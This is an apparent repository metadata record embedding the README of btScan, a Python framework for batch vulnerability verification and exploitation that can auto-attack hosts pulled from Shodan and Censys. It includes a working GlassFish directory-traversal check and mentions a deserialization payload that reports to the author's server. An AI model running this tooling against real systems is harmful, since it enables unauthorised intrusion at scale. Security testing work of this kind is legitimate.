{"id":13843969,"url":"https://github.com/he1m4n6a/btScan","last_synced_at":"2025-07-11T20:30:58.278Z","repository":{"id":49539833,"uuid":"48462904","full_name":"he1m4n6a/btScan","owner":"he1m4n6a","description":"批量漏洞扫描框架","archived":false,"fork":false,"pushed_at":"2024-04-24T15:37:57.000Z","size":463,"stargazers_count":122,"open_issues_count":1,"forks_count":62,"subscribers_count":9,"default_branch":"master","last_synced_at":"2024-11-21T15:39:38.230Z","etag":null,"topics":["batch-script","security-scanner"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/he1m4n6a.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-12-23T01:46:50.000Z","updated_at":"2024-11-01T02:37:39.000Z","dependencies_parsed_at":"2024-11-21T15:43:42.669Z","dependency_job_id":null,"html_url":"https://github.com/he1m4n6a/btScan","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/he1m4n6a/btScan","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/he1m4n6a","download_url":"https://codeload.github.com/he1m4n6a/btScan/tar.gz/refs/heads/master
","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/he1m4n6a%2FbtScan/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264892048,"owners_count":23679211,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["batch-script","security-scanner"],"created_at":"2024-08-04T17:02:31.709Z","updated_at":"2025-07-11T20:30:57.714Z","avatar_url":"https://github.com/he1m4n6a.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"## 目录结构\n\n    --lib 核心文件库\n\n    --report 报告生成的文件夹\n\n    --node 里面每一个py文件是一个攻击向量，添加扫描节点也是向里面添加文件\n\n    --crawl 通过空间搜索引擎抓取url或者ip的脚本\n    \n\n## 使用方法\n    python btScan.py\n    usage: btScan.py [options]\n    \n    * batch vulnerability verification and exploition framework. *\n    By he1m4n6a\n    \n    optional arguments:\n      -h, --help   show this help message and exit\n      -t THREADS   Num of scan threads for each scan process, 20 by default\n      -m MODE      select mode [config|script]\n                   e.g. -m script\n      -n NAME      from node floder choose a script\n      -c COMMAND   give an instruction when use script mode [verify|exploit]\n                   e.g. 
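-c verify\n      -u URL_FILE  input url file\n      -i IP_FILE   input ip file\n      -autoIP      get ip from space search engine and auto attack\n      -autoURL     get url from space search engine and auto attack\n      -v           show program's version number and exit\n\nChecks can be run in two ways: by loading a module (script) or through a configuration file. Use a script for complex checks; a configuration file is enough for simple ones. There are also two run modes: verify mode and exploit mode. Input can be a file of IPs or URLs that you supply, or IPs/URLs can be fetched automatically with the cyberspace-search crawling modules in the crawl folder.\n\n**Examples**\n```\npython btScan.py -n joomla -m script -c verify -u url.txt\n-n selects joomla.py in the node folder; -m script selects script mode, i.e. loading a module; -c verify runs verification only; -u takes a URL file as input.\n```\n```\npython btScan.py -n joomla -m script -c exploit -u url.txt\nSame as above, but in exploit mode.\n```\n```\npython btScan.py  -m config -c verify -i ip.txts\n-m config selects config mode, -c verify selects verify mode and -i takes an IP file as input; the rules in scan_rule.ini under the conf directory are all that is needed.\n```\n\n\n## Plugin writing rules\n\nJust add a new py file to the node folder.\n\nThe two important functions in the py file are verify and exploit. If there is no exploit mode, only verify is needed. The return value has three parts: the first says whether the vulnerability exists (True or False), the second is the url, and the third is the message to print.\n\n***Example (using glassfish.py)***\n\n```\n#!/usr/bin/env python\n#coding=utf8\n\nimport requests\n\ndef verify(ip):\n    # GlassFish admin port 4848; %c0%ae is an overlong UTF-8 encoding of '.'\n    url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'\n    try:\n        r = requests.get(url, verify=False, timeout=5)\n        # A directory listing containing this entry means the traversal worked\n        if 'ejb-timer-service-app' in r.text:\n            msg = 'vul'\n            return True, ip, msg\n        else:\n            msg = 'safe'\n            return False, ip, msg\n    except Exception as e:\n        # A failed request is also reported as 'safe'\n        #msg = str(e)\n        msg = 'safe'\n        return False, ip, msg\n\n\ndef exploit(ip):\n    # No separate exploit step: pass back verify's (bool, ip, msg) result\n    return verify(ip)\n```\nYou are free to define the functions above however you like; the ones that matter are verify and exploit. If exploit would do the same as verify, exploit can simply call verify(url).\n\n## 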
Other\n\nYou need to fill in your own keys for the Shodan and Censys modules in NetSearch.py in the crawl folder.\nThe Java deserialization payload must be changed yourself; otherwise the results are sent to my VPS.\n\nFor any discussion or questions, contact me at he1m4n6a@163.com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhe1m4n6a%2FbtScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhe1m4n6a%2FbtScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhe1m4n6a%2FbtScan/lists"}